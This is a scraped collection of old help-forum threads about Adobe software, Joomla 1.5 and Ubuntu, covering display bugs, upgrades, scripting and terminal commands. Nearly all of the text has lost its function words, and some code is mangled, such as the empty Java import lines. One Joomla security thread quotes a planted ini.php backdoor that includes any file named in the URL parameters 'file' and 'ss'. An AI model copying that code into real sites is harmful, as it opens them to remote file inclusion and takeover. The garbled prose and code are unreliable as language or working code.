
Showing posts from June, 2011

Why does LR3 expand ALL my folders automatically everytime ??

this driving me absolutely nuts.   why assume want see every ******** folder open in entire photography hard-disk expanded ?????   i'm having minimize top folders can folder i'm working on.   is there way can put stop ??   thanks. if you're using 3.0, try 3.2rc   one of bug fixes is: library: if directory tree collapsed prior closing lightroom appear expanded after re-launching application   other that, try alt-clicking / opt-clicking on parent folder's disclosure triangle close of folders , subfolders in 1 go, , that'll stick. More discussions in Lightroom Classic CC adobe

Can I resize a component instance as part of a transition?

i'd resize instance of custom component part of transition. i'd expect see re-size handles on component instance when select (i when select artwork) , i'd expect see scaling properties such scalex , scaley alongside x , y in properties panel they're not there. what's best way resize component instnce in transition? hi graeme,   i tried out button component , xy postition , scale worked me.  i set start , end state. changed xy position , scale of common button component instance in each state added interaction button navigate between states added smooth transitions between states ran file.   see file @ url.   tanya More discussions in Flash Catalyst adobe

Crash caused by a single-page?

i'm working on 20-page booklet , time page 13 of booklet accessed (pages panel, screen view, page tool in bottom right of window), indesign freezes , have force quit. if try export pdf, gets page 13 , freezes/crashes. i'm able export pages 1-12 , 14-20 , works swimmingly. whatever on page 13, can't access delete off or start scratch. make sense anybody? what os, , (way more important) version of indesign?   (i'm thinking: cs5. right?) More discussions in InDesign adobe

Looks fine i nback end but front end BAH! - Joomla! Forum - community, help and support

hi guys, when i'm creating artical content nthe back-end looks how want it, when click preview looks perfect (see image) when view artical , it's content nfront end plain text (see image) have absolultey no clue why be? have idea?? images attached this editors text editor/wysiwyg editor dosent use same css "frontend" i figting same problem jce editor Board index Joomla! Older Version Support Joomla! 1.5 Extensions for Joomla! 1.5

Premiere Elements 8 video looks bad when editing

hi -   i'm brand new premiere elements 8 - in fact installed on hp/compaq 6530b laptop running windows vista (32 bit).  initially, tried edit flip video (mpg4) , flip video converted avi.  have new canon vixia hf m31; regardless of video use, video editing window looks horrible.  there's "double image" - 1 on top heavy green , there's "double image" of video below looks better below green-shaded video (see inserted image below).  i'm wondering if it's issue laptop, since multiple video formats have same problem.  begin resolve this?   note: i've taken same video , looks fine windows movie maker (at least mpg4 - haven't tried vixia .mts video yet i'm guessing won't work movie maker).   thanks, calvin welcome forum.   please see links in thread . most, caused obsolete video driver.   good luck,   hunt More discussions in Premiere Elements adobe

Older version of Flash Player available

hi, sadly few month flash player buggy crashes. therefore reinstall older version of time when worked well. may adobe provide older version of flash player again?   os: win xp 32bit browser: firefox 3.6.8 (but flash player crashes on of browsers, that's not real problem) i have tried different flash player versions (, 10.1) there's no 1 working. i have disabled hardware accelaration, doesn't bring change.   i install older version of flash player worked right.   is possible? archived flash player versions:   some of these downloads large, because contain released versions platforms.   make sure uninstall newer fp versions before install older version. More discussions in Using Flash Player adobe

Why do my buttons disappear?

hi everyone. i've been working on as3 script control flvplayback component.  i'm close making work.  let me describe want happen.   on homepage have div container video located. want still image of video load play button on it.  upon mouse on want button change colors, upon mouse click want video play.   i have .fla project i'm working.  i've got flvplayback component, sourced .flv.  i've created button , works.  when click video plays.   i have 3 layers. actions (this top layer) buttons (has button , progress bar) assets (only flvplayer)   the following as3 set frame1 in actions layer.   i'm using flashcs4, as3 , dreamweavercs4   here weird issue.   #1.  while working in flash.  if publish preview play button load split second , disappear replaced still image.  if click on center of still image play button should be, video play.   #2.  if view online.  play buttons never disappear, still image never loads.   i'm confused , stumped.   here as3 code.  i'm

Joomla Administration Toobar with Broken Text! - Joomla! Forum - community, help and support

i upgraded joomla site 1.5.11 1.5.14. however, since doing so, see backend toolbars whenever editing item broken coding sticking out shouldn't. not affect functions of site, far. however, worried down road. can enlighten me on how fix this? have included snapshot of it. it looks broken ftp update me. can try again , make sure files overwritten Board index Joomla! Older Version Support Joomla! 1.5 General Questions/New to Joomla! 1.5

How to round bottom corners of a spark panel?

title says it  all! flexexamples - invaluable source - should you: -container-in-flex-4/?utm_source=feedburner&utm_medium=feed&utm_campaign=feed%3a+flexexamp les+%28flex+examples%29 read comments. once again, thank you, peter. ftquest More discussions in Flex (Read Only) adobe

How to keep my bloglayout article page, even after I click - Joomla! Forum - community, help and support

ive got multiple articles shown in blog layout. when click 1 of articles (read more), show me single article, looses blog layout other articles. i keep layout can click article without going first. want other articles still visible after click one.. this how ive got right now.. (test site) ... &itemid=17 thanks guys! Board index Joomla! Older Version Support Joomla! 1.5 General Questions/New to Joomla! 1.5

Thread: Uninstall Ubuntu from Dell Inspirion Mini

how go uninstalling ubuntu netbook , resizing partitions onto windows c: partition? have no xp installation cd use or usb setup xp installation. want netbook windows because want setup ubuntu on main laptop. in advanced. you can run gparted ubuntu live cd. Forum The Ubuntu Forum Community Ubuntu Official Flavours Support General Help [ubuntu] Uninstall Ubuntu from Dell Inspirion Mini Ubuntu

Prevent newline in s:TextArea

hi,   i trying create multi-line textinput using [spark] textarea , disallowing line breaks. (perhaps there better way?) anyway, disallow newlines trying use:   restrict="^\r"   but doesn't seem work. neither \n \u000d \u000c etc. whatever put in there in relation newlines doesn't excluded , appears in textarea. other characters such "a" work fine.   does have ideas how either work, or how prevent newline characters other way, eg. incercepting events.   thanks, chris you missusing restrict property. if read document restrict property used enter things included in it   eg   mytextarea.restrict = "a-z";  // user can enter uppercase characters... so correct .... for solution working on ur problem... if post answers question or helps, please kindly mark such. More discussions in Flex (Read Only) adobe

Thread: Help! Screen flashing on start up!

i tried enable compiz on netbook, installed ccsm. when enabled visual effects , restarted, netbooks monitor starts flashing when boot up. restarted in low graphics mode, uninstalled ccsm, , it's still flashing. there else need remove netbooks monitor normal? thanks! the problem compiz still thinks it's enabled. start in recovery mode if flashing makes gui version unusable. you'll need login though, because problem lies in your-user home directory settings. i'm showing prompts in blue below, it's clear you're supposed far system concerned, don't type in, of course. memory, hope it's close enough works! code: root# su - your-user-name (note spaces on either side of hyphen) may ask password again. not sure. code: your-user$ metacity --replace ("compiz --replace" in terminal toggle compiz again. can use "metacity --replace" in terminal time toggle comp

Competition site with voting - Joomla! Forum - community, help and support

hi fellow joomlaites, i have been trawling through web in search of extension fnish off competiin website trying develop. have stumbled accross 1 slike artistavenue died while ago musicbox, mjoosic, , various rating extensions. jamroom looks work i'm looking joomla solution. basically requirements are: - contestants profiles - possibility of different types ofcontestants, including ability vote others not themselves. including current number of votes , vote button. - ability search profilesin each category or overall. - voters profiles - people aren't participating voting winner - voting must based on number of votes , not rating, ie. 189 votes rather 4\5 rating - ability publish top 5 or 10 voted contestants on front page of relative category vote button. - ability charge or not charge votes, either using credit card or paypal can doneusing shopping cart. some of functionality above available in cb , jommla 1.5 haven't come across handles voting way like. any , input welco

Dear, please help me... - Joomla! Forum - community, help and support

dear there, i'm new joomla. i think made stupid operation , changed settings last login. i crossed (x) joomla authenticatioin in module , saved it. when quit , want log in again (by ), although entered previous correct username , pwd, appears "jauthentication::__construct: not load authentication libraries. username , password not match". what shall do? change settings , login without problem? woooo~~~~~~~~ please help. thank you, ben oh, god, i'm sincerely following lamb... of honor belongs you, lord... i compared joomla system/modules installed in localhost , login mysql (i never know , used it) of website , tried change settings... i successed @ last , solved problems myself... wow~~~~~~~ cheers! Board index Joomla! Older Version Support Joomla! 1.5 Administration 1.5

Lightroom 2 doesn’t recognize iPhone

lightroom 2 used open import window when plugged in iphone 3g doesn't. doesn't show , "import photos device" grayed out. able import photos iphone if camera. any advice appreciated. steve not sure, sounds os no longer seeing device.  iphone show anywhere else?  if not, perhaps youi need reinstall software recognized? what platform, os?   cheers! More discussions in Lightroom Classic CC adobe

video pluggin needed

i had great pluggin insert video on pages computer stolen it.  knows of dreamweaver pluggin insert videos? dw can insert flv , swf file types you. insert > media > flash >   if switch code view, can paste whichever player code need directly web page   video streaming basics -   nancy o. alt-web design & publishing web | graphics | print | media  specialists More discussions in Dreamweaver support forum adobe

Thread: I can see my neighbors networks, but mine does not show up on the list..

for reason network not show on list of available networks, not hidden network. , wp2 of neighbors networks are... i'm using linksys wireless n broadband router.. (model # wrt160n v2) have apple airport express, when plugged in show on list, unable connect it.. keeps trying establish connection never works.. using custom build pc, , has been breeze until now... brand new linux (i installed lastest version of xubuntu, lucid lynx 10.04) ideas or suggestions? also, living @ parents house, , router lynksys (which better apple router anyways) need connect network , not apple router's network. please me! in advance if take time reply. -soundofbread can connect internet using ethernet cable (wired)? possible security settings enable wireless connection internet not set properly? computer seeing neighbours networks from? Forum The Ubuntu Forum Community U

Thread: Rhythmbox terminal commands

does know command line option show rhythmbox? want make shortcut show rhythmbox screen opposed clicking icon , selecting show rhythmbox rhythmbox-client --(option) --no-start you can see manual with: code: man rhythmbox you notice there no option want, find new behaviour annoying did, go add-ons (plugins) options (under edit) , disable tray icon. Forum The Ubuntu Forum Community Ubuntu Official Flavours Support General Help [SOLVED] Rhythmbox terminal commands Ubuntu

Thread: Java phonebook help

so i'm in process of making phonebook application , i'm looking guidance. far application takes input .txt file , prints out first 3 lines. asks user input information, , allows user search term inside entertered information. want code read in .txt file, , ask user want search for, reply line information on, rest of information. e.g. "enter search term" - 'ubuntu' 'ubuntu' found on line 22 , phone number 0123456789 suggestions? (code below) code: import java.util.scanner; import; import; import; import; import; import; import java.util.regex.matcher; import java.util.regex.pattern; class blondie { public static void main(string args[]) throws ioexception { scanner fileinput = new s

Thread: how to know the dev of cdrom driver from cdrecord ?

hello found on internet command indicates drive info; how saying /dev/hdc cdrecord atip command ? code: drive=$(cdrecord -atip 2>&1) ; echo $selection | while read ; echo "$i" ; done solved ! code: wodim --devices | grep dev= | cut -f1 | cut -d"=" -f2 | sed s/\'//g | tail -n 1 Forum The Ubuntu Forum Community Ubuntu Official Flavours Support New to Ubuntu [SOLVED] how to know the dev of cdrom driver from cdrecord ? Ubuntu

Session timeout automatic logout - Joomla! Forum - community, help and support

hi, im having problems joomla 1.5 site. in administrator section under global configuration have set session lifetime 30 minutes. after want users automatically logged out. works.. however, when session "dies" user not logged out, not logged out (the redirection doesnt work). possible log out user when session dies? to clarify: when session dies want same effect when user clicks "log out". also when session dies , user automatically "logged out" 2 login attempts required.. idea why? thanks! oh, he's "really" logged out... don't believe it? click on something. Board index Joomla! Older Version Support Joomla! 1.5 Administration 1.5

Thread: Windows is gone - SERIOUS PROBLEM

my second partition, on windows vista sitting, listed free. windows vista no longer shows on grub menu, , can't mount partition on. haven't booted windows in while, i'm not sure how long ago happened. best guess sometime in last 3-4 weeks. don't know whether i've mounted partition in ubuntu since last time booted it. other accessing play music off of, , saving documents it, never used partition much. have suggestions on should do? think i'm backed up, need windows time time, , don't want have risk losing haven't backed recently. considering harddrives not erase on own must ask changes drive have made in these last 3-4 weeks may have done this? causing not able mount drive either in ubuntu or via livecd? (meaning please provide errors getting) Forum The Ubuntu Forum Community Ubuntu Official Flavours Support General Help [

CS4: Image preview size different than what's saved

i've been attempting optimize animated banner gif's have been running confusing problems. when configure image quality options gif, size image preview dialog shows me not size that's saved hard drive. in fact, image size saved seems arbitrary compared settings i've used. example, i've tried optimizing 200x200 gif 2 states (settings: 256 color, 100 loss, 0 dither) , it's come out 45k, tried saving same image 2 colors , it's come out 70k (and not 2 colors, might add). admit i'm fireworks beginner i've been using photoshop years, understand save dialog , image optimization.   my general process has been save each gif state high quality jpeg , import each state fireworks , save animated gif. here appreciated have waiting on these banners. you need 'export' animated gif not 'save as.' note gif format never give result jpeg's because of limited number of colors available. might better resut exporting in flash format. More discussions

Thread: 9.04 ok but 10.04 hangs on Toshiba Sat M200

hi all, can here..... have searched can't find similar problem posted sorry if missed it... should hardware person primarily, , while have had little bit of 'play' ubuntu in past, still begginer, please try keep suggestions noob level of instruction. assume know nothing , can't go wrong..... now...... have little toshiba satellite m200 came vista (ugggh!) needless vista has fallen on own huge feet , landed in scrambled pile. have mnaged copy off data needed, , tossed between xp or ubuntu re-install. decided go ubuntu try , used on single machine before (hopefully) changing on rest of computers here m$ free. so....... booted m200 live-cd of 9.04 had while , ran fine. ok, looks far. checked latest version , downloaded/burned live-cd of 10.04 ran fine on m200 when booted it. istalled 10.04 live-cd after initial reboot (and boot attempts since then) computer hung while still loading (before reached gui) , had corrupted screen, lines, colo

is ini.php file supposed to be in root of Joomla? - Joomla! Forum - community, help and support

good day is file ini.php file joomla installation? contents are: <? echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_get["file"]); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); include($_get["ss"]); ?> thanks where did discover file? such file not placed in web root joomla! installer. Board index Joomla! Older Version Support Joomla! 1.5 Security in Joomla! 1.5

Need to down grade my Joomla. Help - Joomla! Forum - community, help and support

hi. testing joomla 1.5.14 version , found has many short-comings. unfortunately had started on website , gone far. can come rescue , tell me how can degrade joomla 1.5.13 or 12 please before restart job. there way can assisted?will appreciate. not sure short comings you're referring to. security reasons, should not downgrade version. said, if want it, should able overwrite joomla files previous [minor] version. again, should not have real reason this. if have specific problems, better address them. Board index Joomla! Older Version Support Joomla! 1.5 General Questions/New to Joomla! 1.5

Contribute Cs5 bug in reading pdf. file

i using trial version of contribute cs5 on mac.  when want see pdf. file on website through contribute cs5, after following instruction, got following message: the requested url /src_residents/interest group/walkers schedule/currentmonth__mmtmp315cb6b9/currentmonth.pdf not found on server. additionally, 404 not found error encountered while trying use errordocument handle request.   i looked website , found there added folder above name, there nothing in folder. file there because can see on website directly in same folder added folder contribute.   i think bug in contribute program.  apparently contribute created folder did not put file in right place. i consider buying version if bug corrected. does contribute cs5 have same problem in pc version?   tsing bardin hi tsing,        currentmonth__mmtmp315cb6b9 folder in website temporary folder created in website, when preview in browser of web page in contribute. so, when preview in browser, temporary folder created in server, , web pa

Thread: Device ID

how find device node usb drive in kubuntu. hi, try pasting these commands konsole/terminal after device plugged in (and turned on if necessary). 1 of these should give info looking for. code: sudo fdisk -l list of disks , shows device names , partition info. code: sudo blkid shows uuids , device names of disks. code: sudo lshw lists hardware , info. hope helps. Forum The Ubuntu Forum Community Ubuntu Official Flavours Support General Help [kubuntu] Device ID Ubuntu

Thread: Why does a key drop all privliges appear?

why key drop privliges appear? reply tuesday, going upnorth posted lukasz tarkowski why key drop privliges appear? reply tuesday, going upnorth in order answer question, suggest read please: Forum The Ubuntu Forum Community Ubuntu Official Flavours Support General Help [ubuntu] Why does a key drop all privliges appear? Ubuntu

A curious class_exists() allows for alternate Joomla Classes - Joomla! Forum - community, help and support

has noticed, when walking through code of typical start joomla 1.5 website, file, import.php, ( called in index file, index.php, require_once ( jpath_base .ds.'includes'.ds.'framework.php' ); ), test first see if jloader class has not been included? .../libraries/joomla/import.php: code: select all /**  * load loader class  */ if (! class_exists('jloader')) {     require_once( jpath_libraries.ds.'loader.php'); } what curious thing! the file used throughout joomla load in core framework classes , more tested see if it's included before included! looks me done design allow sly if not malicious intervention. what if class, jloader, had existed @ point? what if 'alternate' index file called, indexalt.php, had following code?: code: select all <?php if(!defined('ds')) {        define( 'ds', directory_separator ); } $altloader = dirname( __file__ ).ds.'plugins'.ds.'system'.ds.basename(__file__, '.php').d

Weird behavior: Throws an error while debugging/Run mode, but doesn't when project is built

hi there,   i trying see if on strange situation:   i developing desktop application few window components (like music window, rss feeds, photos window, etc). trying have checkbox in "preferences" component disable or enable appropriate window component.   when trying test checkbox in application (in either debug mode or 'run' mode) error being thrown not able figure out why error occurs (though know complaining null object reference). when building application "export release build" option , installing application on desktop test same checkbox - works!! not sure why happening. help?   can tell me why it's not complaining null object when build project or how overcome problem?   this error:   typeerror: error #1009: cannot access property or method of null object reference. at components::componentcontainer/getcomponentdata()[/users/desktop/projects/desktoplauncher /src/mycomponents/] at function/

Thread: How to open programs from terminal?

my linux machine eeepc running unr 10.04.1 lts. discovered how open terminal without using mouse, , work out how use take fingers off mousepad more. how can use terminal start programs? guessing there's bit of knowledge need have filesystem...i don't know where, instance, chromium executable exists in filespace. thought might work type 'open chromium-browser' when in root directory, error message 'couldn't file descriptor referring console.' missing argument, or because i'm not opening right location? none of above, or of above plus other stuff? for basic applications matter of typing name. if not sure of name can type first few letters , press tab button , show list of commands. need example code: chromium-browser Forum The Ubuntu Forum Community Ubuntu Official Flavours Support New to Ubuntu How

MySQL Database Screwup - Joomla! Forum - community, help and support

i'll right here, screwed up. while doing demonstration joomla site, has worked last 6 months, installed joomla installation in subfolder on domain. installation demonstration, setup mysql information reflect same database i'm using website, demonstrate how works (apparently huge mistake). i finished installation installing sample data, show how can when beginning work joomla. so, problem now, site (the 1 in root folder), looks brand new installation of joomla. articles, modules, templates, etc. gone. if go @ mysql database however, can see still there. can see of articles , else still in it. so. . . how access material? how joomla was? most hosting companies have backups 48 hours... least 7 days... hire professional before time runs out. Board index Joomla! Older Version Support Joomla! 1.5 General Questions/New to Joomla! 1.5


hi all,        using flex 3 , blazeds in project. getting following error when user performs backend calls. after time not getting error same backend call. happening randomly     fault = (mx.rpc::fault)#243     errorid = 0     faultcode = ""     faultdetail = " http: failed"     faultstring = "error"     message = " faultstring:'error' faultdetail:' http: failed'"     name = "error"     rootcause = (object)#244       code = ""       description = "http: failed"       details = " https://<server>/<context root>/fmb/amfsecure "       level = "error"     kindly suggest me solution this.     thanks, pradeep. after lots of research, found following request send flex server as:   03-feb-11 04:27:03 debug logger endpoint.amf : deserializing amf/http re

Remove or edit this drop down thing in headmenu - Joomla! Forum - community, help and support

new joomla, how remove or edit "vps" ? hello, login admin side. go path menus==> click particular menu(example main menu) ==> select vps menu. if need remove menu. in top trash button available can cilck button. particular menu deleted. if want edit button select vps menu , click edit button. done Board index Joomla! Older Version Support Joomla! 1.5 General Questions/New to Joomla! 1.5

How many times can I upgrade my Adobe Flash?

i have upgraded macromedia flash mx adobe flash cs3. can continue upgrade newer version? there limit upgrades?   if have install above again, have install flash mx, cs3 , new version???   can enlighten me? upgrades based on current version have installed.  long installed version recognized being within upgradeable range, can upgrade newer version.  historically, allowed range upgrades includes 3 versions, if own cs3, , allowed range remains has, cs6 last version can upgrade cs3.   i think if have serial number previous version, need... installation process see if can find previous version, if cannot, believe prompt enter serial number instead.  (from own experience in reinstalling things cleaned machine) More discussions in Adobe Animate CC - General adobe

How do I open old projects in CS5?!

i purchased new imac our office. old version of premier (premier 6.5) had wouldn't run new os system (10.6.4), we've upgraded cs5 , none of our older projects open... creates huge problem since lot of 30 second tv spots local car dealers , tend change few minor things every month. might color of car or current incentive. build off last month's commercial instead of redesigning wheel every time... there way open or import older projects or pretty screwed , have recreate them?   thanks,   rick premiere (not pro) projects can opened on windows versions of premiere pro. check docs ( importing earlier premiere pro projects ) more information on this.   you'd have find windows version of cs5 (or actually, can go few versions) open project files , save them premiere pro project files. these open on mac. More discussions in Premiere Pro CC adobe

Paragrah style "Title" (~20 words), export to XMP "Title"

does know of way, or purchase script indesign cs5 allow me take text box containing paragraph style that's called "title" , have cript run , place same title in xmp, title area? implementing asset managment solution require key in title in asset management database, , avoid re-work possible having document changes time created final sign off, , may go in "welcome blue room" @ assent mangement side, final id document "welcome red room". i'd prefer have id file update asset management file xmp data creates.   if has idea or suggestion, i'd appreciative.   thank you,   b hey!   i think it:   app.findtextpreferences = nothingenum.nothing; app.changetextpreferences = nothingenum.nothing; app.findtextpreferences.appliedparagraphstyle = "title"; app.activedocument.metadatapreferences.documenttitle = app.findtext()[0].contents;   -- tomaxxi More discussions in InDesign Scripting adobe

Is it possible to run RoboHelp 8 with VSS on Windows 7

is aware of whether possible use vss robohelp 8 on windows 7? understanding robohelp compatible windows 7 have not seen specific on using vss source control , given recent experiences after upgrading think may not possible.   basically after upgrading windows xp windows 7, reinstalled robohelp 8 , vss. got latest version of project down c: drive , double clicked xpj file open project.   as robohelp loading following error:   i click yes nothing happens , robohelp continues open. strangely once has opened, there no link version control file option , no option select version control toolbar!? it's if doesnt exist @ all.   for reference using robohelp html, version 8.0.2   any advice or appreciated. More discussions in Source Control adobe

Reseting slides after interaction

the course working on completed , went out final approval, , being person course came me formatting changes , development request.   in existing course, users select , answer (right or wrong) slide , move next slide , carry on normal.   the individual want able retrun previous slide , have of questions reset taken again. there no recording of scores on project, wants user able reselect questions again.   i need know how can reset previous slide original state prior interaction.   i eternally grateful if can me ideas.   i  haven't come might me problem.   regards   steve interesting issue... ...but not 1 answered here since make no mention of tool. i suspect you're using captivate and, if so, best repost in 1 of captivate forums... erik More discussions in Adobe eLearning adobe

Building a blog community/properly displaying RSS feeds - Joomla! Forum - community, help and support

greetings, i building website list latest blog entries list of .xml's use. an example of website want build : basically have rss feeds display on website with showing blog title, description, date of publish, , author, (a picture of blogger's profile bonus). i have literally tried around 20 rss feed displays today. not single 1 show author's name or many of them not show descriptions.. big mess. does know of simple rss feeder or sort of blog feeder post latest blog article on frontpage in joomla? i apprecaite it, bluenetwork please... can point me in right direction? i want mod or in can aggregate multiple blogs on homepage. -blue Board index Joomla! Older Version Support Joomla! 1.5 General Questions/New to Joomla! 1.5

Choice Subform Set Data Binding

we use choice subform set display different subforms based on whether hasscore value set yes or no.  done repeatedly in form want try , map choice subform sets use hasscore value same data instance in our xml.  when attempt first choice subform set works.  rest default first subform in choice subform set.  way rest of choice subform sets work duplicate data instance in our xml match number of choice subform sets in form.   any way choice subform sets use same data instance in xml?  or there better way without resorting javascript show/hide subforms?  choice subform set looks nice don't want duplicate xml data work.   what have when have 3 choice subform sets use hasscore value: <?xml version="1.0" encoding="utf-8"?> < loan_info >   < score >     < hasscore > yes </ hasscore >   </ score >   < score >     < hasscore > yes </ hasscore >   </ score >   < score >     < hasscore > yes </ hassc

Custom module style using template image(s)? - Joomla! Forum - community, help and support

okay, i've created custom template, , gotten working. however, i'm wanting create custom option displaying modules within template. found if create appropriate function in /html/modules.php file in template can make "<jdoc:include type="modules" name="menu" style="mycustom" />" call in template show modules using chrome. that works fine, run problem chrome function wants use images template itself. in template index.php file have been accessing images in template folder "<img src="<?php echo $this->baseurl; ?>/templates/<?php echo $this->template; ?>/images/logo.png" alt="my logo" />", "$this" object doesn't seem work in modules.php file. how can access "this" object template using, such can parameters? or how best should refer image in templates directory without hard-coding folder structure site has? Board index Joomla!

Finding which files are missing

i had disk problem , had recreate files backups, kept prviews, , catalog stuff.   now there many missing files must find, going through entire catalog 1 one pain.  there way create filter or make smart collection show previews of missing files only?   wil wil,   unfortunately, afaik, there's not such function in lr native. use john beardy's search replace transfer plugin (use parse + audit function) populate metadata field can filtered on (by means of metadata filter or smart collections).   beat gossweiler switzerland More discussions in Lightroom Classic CC adobe

Flash CS5 giving me headaches No Bold style for Arial Unicode MS

hi, upgraded flash cs5 , facing lot of problems. created static textfield on stage publish settings flash player6 as1.0 selected settings shown in attached screenshot.   problem can't select bold styles greyed out. work fine in adobe flash cs3. knows may doing wrong More discussions in Adobe Animate CC - General adobe

Help Finding the right Photo Slide Show - Joomla! Forum - community, help and support

i've been searching while no success , appreciate suggestions. can me find photo slide show extension (preferably free) with: - (must have) button pop picture info or plain image labels - (must have) ability embed link other site in picture - (must have) support large pictures (i.e. fill whole screen) - (very nice have) slide show opens in new window - (nice have) video ability to give idea of features i'm looking for, here's site (i promise i'm not affiliated them... sure wish was): Board index Joomla! Older Version Support Joomla! 1.5 Extensions for Joomla! 1.5